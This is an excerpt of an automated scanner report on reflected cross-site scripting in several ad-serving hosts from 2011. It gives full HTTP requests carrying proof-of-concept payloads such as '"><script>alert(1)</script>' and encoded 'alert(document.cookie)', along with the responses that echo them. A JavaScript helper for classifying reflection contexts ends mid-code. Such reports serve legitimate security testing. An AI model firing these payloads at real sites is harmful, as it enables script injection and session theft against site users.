Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = "";
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3a0"-alert(1)-"cc96eba19d7 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31220"-alert(1)-"5c310f7490c was submitted in the sz parameter. This input was echoed unmodified in the application's response. (The scanner attributes the probe to sz because it treats the whole ;sz=300x250;click=... path segment as one parameter; in the request below the probe is actually appended to the sa=l value inside the embedded click URL, and it is reflected inside the escape("...") call that builds the click-through URL.)
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/f/1fe/%2a/c%3B232704189%3B1-0%3B0%3B50545246%3B4307-300/250%3B40436189/40453976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5u ...[SNIP]...
1.21. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N3285.msn-dm/B2343920.67
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3d94"-alert(1)-"3cf86d08147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4153
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... .net/click%3Bh%3Dv8/3aa2/f/6b/%2a/u%3B222980277%3B4-0%3B0%3B25708763%3B4307-300/250%3B40308306/40326093/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D25708763-222980277-40326093"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 3 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487d"-alert(1)-"2c5b6b5daa5 was submitted in the sz parameter. This input was echoed unmodified in the application's response. (The scanner attributes the probe to sz because it treats the whole ;sz=300x250;ord=... path segment as one parameter; in the request below the probe is appended to the end of the click URL, after href=.)
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4163
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... k.net/click%3Bh%3Dv8/3aa2/7/68/%2a/p%3B222980277%3B2-0%3B0%3B25708763%3B4307-300/250%3B40114169/40131956/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40131956"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 300; var winH ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f361"><script>alert(1)</script>7e001703d00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/dmd.ehow/computers6f361"><script>alert(1)</script>7e001703d00;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 593
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers6f361"><script>alert(1)</script>7e001703d00&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c21"><script>alert(1)</script>57155bc0307 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/dmd.ehow/homepagee1c21"><script>alert(1)</script>57155bc0307;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:28:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 592
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepagee1c21"><script>alert(1)</script>57155bc0307&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f"> ...[SNIP]...
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97345'-alert(1)-'e55a08937c8 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=160x60097345'-alert(1)-'e55a08937c8&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6cd7'-alert(1)-'948355e44c0 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=160x600&s=429613d6cd7'-alert(1)-'948355e44c0&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close
The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e920'-alert(1)-'fcb38195981 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=160x6008e920'-alert(1)-'fcb38195981&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close
The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b92"><script>alert(1)</script>9e1c2d8085e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close
The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f47e8'-alert(1)-'64ed47f711b was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=160x600&section=429613f47e8'-alert(1)-'64ed47f711b HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close
The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92b8"><script>alert(1)</script>05d28b2545d was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600&section=429613f92b8"><script>alert(1)</script>05d28b2545d HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close
1.31. http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.reduxmedia.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc2b"-alert(1)-"605cd6b88a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=120x600&section=681714&6cc2b"-alert(1)-"605cd6b88a5=1 HTTP/1.1
Host: ad.reduxmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 19:18:16 GMT
Pragma: no-cache
Content-Length: 4638
Age: 0
Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1&Z=120x600&s=681714&_salt=272437912";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr ...[SNIP]...
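Each finding in this report rests on the same two observations: the probe came back byte-for-byte, and it landed in a context whose delimiter the probe contains. The block below is an added example, not part of the scan report, that performs that check offline and classifies the reflection context the way the report's wording does (JavaScript string in double or single quotes, HTML attribute in double quotes, and so on). The first two sample bodies are trimmed copies of the ad.reduxmedia.com and ehow.com responses quoted in this report; the third and fourth are constructed stand-ins, since the report shows only headers for the text/javascript /imp responses and shows no encoded (non-vulnerable) case. Function names and context labels are this example's own convention.

```javascript
// Added example, not part of the scan report: reproduce offline the check
// that confirms a reflected-XSS finding, by locating the probe in the body,
// classifying the syntactic context around it, and testing whether the
// probe's break-out character matches that context. Samples 1 and 2 are
// trimmed copies of responses quoted in the report; 3 and 4 are constructed.

// Start offset of the <script> element content enclosing idx, or -1 when idx
// is not inside script content (a probe inside the start tag's own
// attributes, as in the SRC="..." findings, is HTML, not script).
function scriptContentStart(body, idx) {
  const lower = body.toLowerCase();
  const open = lower.lastIndexOf('<script', idx);
  if (open === -1) return -1;
  const startTagEnd = lower.indexOf('>', open);
  if (startTagEnd === -1 || startTagEnd >= idx) return -1;
  const close = lower.indexOf('</script', startTagEnd);
  return close !== -1 && close < idx ? -1 : startTagEnd + 1;
}

// Which quote character, if any, is still open at the end of src.
// Backslash escapes only count in JavaScript, not in HTML attributes.
function openQuote(src, jsEscapes) {
  let q = null;
  for (let i = 0; i < src.length; i++) {
    const c = src[i];
    if (q) {
      if (jsEscapes && c === '\\') { i++; continue; }
      if (c === q) q = null;
    } else if (c === '"' || c === "'") {
      q = c;
    }
  }
  return q;
}

function classifyReflection(body, probe, contentType = 'text/html') {
  const idx = body.indexOf(probe);
  if (idx === -1) return 'not-reflected';            // encoded or filtered
  const scriptStart = /javascript/i.test(contentType) ? 0 : scriptContentStart(body, idx);
  if (scriptStart !== -1) {
    const q = openQuote(body.slice(scriptStart, idx), true);
    return q === '"' ? 'js-string-double' : q === "'" ? 'js-string-single' : 'js-code';
  }
  const lastLt = body.lastIndexOf('<', idx);
  const lastGt = body.lastIndexOf('>', idx);
  if (lastLt === -1 || lastGt > lastLt) return 'html-text';
  const q = openQuote(body.slice(lastLt, idx), false);
  return q === '"' ? 'html-attr-double' : q === "'" ? 'html-attr-single' : 'html-tag';
}

// Character the probe must contain to break out of each context.
const BREAKOUT = {
  'js-string-double': '"', 'js-string-single': "'", 'js-code': '',
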